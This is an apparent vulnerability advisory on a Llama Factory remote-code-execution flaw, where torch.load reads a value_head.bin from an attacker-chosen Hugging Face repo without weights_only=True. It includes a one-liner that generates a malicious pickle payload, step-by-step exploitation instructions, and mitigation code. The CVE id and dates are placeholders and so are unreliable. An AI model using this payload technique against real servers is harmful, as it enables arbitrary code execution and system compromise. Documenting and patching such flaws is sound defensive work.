Llama Factory, Remote Code Execution, CVE-2024-XXXX (Critical)


How the CVE Works

The vulnerability occurs when Llama Factory loads `vhead_file` during training. An attacker exploits it by supplying a malicious `Checkpoint path` via the WebUI. That value is passed to the training process as the `adapter_name_or_path` parameter, and the process fetches a `value_head.bin` file from the corresponding Hugging Face repository. The file is then loaded with `torch.load()` without the `weights_only=True` security parameter, allowing arbitrary code execution. Because torch versions below 2.6 default to `weights_only=False` and Llama Factory only requires `torch>=2.0.0`, affected installations remain exposed to RCE.
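
Sketched below is how such a load path typically looks. This is a simplified, hypothetical reconstruction, not the verbatim Llama Factory source: `load_value_head` is an illustrative name, and `hf_hub_download` stands in for whatever download helper the project actually uses.

```python
import torch
from huggingface_hub import hf_hub_download


def load_value_head(adapter_name_or_path: str) -> dict:
    # The repo id comes directly from the user-supplied "Checkpoint path".
    vhead_file = hf_hub_download(repo_id=adapter_name_or_path, filename="value_head.bin")
    # Without weights_only=True, torch.load falls back to full pickle
    # deserialization, so a crafted value_head.bin executes attacker code here.
    return torch.load(vhead_file, map_location="cpu")
```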

DailyCVE Form

Platform: Llama Factory
Version: <=0.9.3
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2024-XX-XX

Prediction: Patch expected by 2024-07-15

What Undercode Say

Exploitable Code (src/llamafactory/model/model_utils/valuehead.py):

```python
vhead_file = torch.load("value_head.bin")  # missing weights_only=True
```
Malicious Payload Generation:

```bash
python3 -c "import torch, os; torch.save(type('Evil', (), {'__reduce__': lambda self: (os.system, ('touch HACKED',))})(), 'value_head.bin')"
```
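
Why this works: `torch.load()` without `weights_only=True` unpickles arbitrary objects, and unpickling an object whose `__reduce__` returned `(os.system, ('touch HACKED',))` invokes that callable at load time. A quick local check, assuming the `value_head.bin` generated above sits in the working directory:

```python
import torch

# torch < 2.6 default (weights_only=False): the embedded os.system call
# runs during deserialization and creates the HACKED file.
torch.load("value_head.bin", weights_only=False)

# Hardened load: non-allowlisted callables such as os.system are rejected.
try:
    torch.load("value_head.bin", weights_only=True)
except Exception as exc:  # pickle.UnpicklingError on the malicious file
    print(f"blocked: {exc}")
```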

How to Exploit

  1. Set `Checkpoint path` to a malicious Hugging Face repo.
  2. Trigger Reward Modeling training.
  3. The server executes the attacker's payload.

Protection from this CVE

  • Update to Llama Factory >0.9.3.
  • Enforce `torch.load(weights_only=True)` (see the sketch after this list).
  • Restrict Hugging Face model sources.
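
A minimal mitigation sketch combining the last two points, assuming a hypothetical allowlist (`TRUSTED_REPO_PREFIXES` and `safe_load_value_head` are illustrative names, not Llama Factory APIs):

```python
import torch

TRUSTED_REPO_PREFIXES = ("my-org/",)  # hypothetical allowlist of checkpoint sources


def safe_load_value_head(vhead_file: str, repo_id: str) -> dict:
    # Reject checkpoints that do not come from an approved namespace.
    if not repo_id.startswith(TRUSTED_REPO_PREFIXES):
        raise ValueError(f"untrusted checkpoint source: {repo_id}")
    # weights_only=True restricts unpickling to tensors and plain containers,
    # regardless of which torch version is installed (>=1.13 supports the flag).
    return torch.load(vhead_file, map_location="cpu", weights_only=True)
```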

Impact

  • Arbitrary command execution.
  • Data breaches.
  • System compromise.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

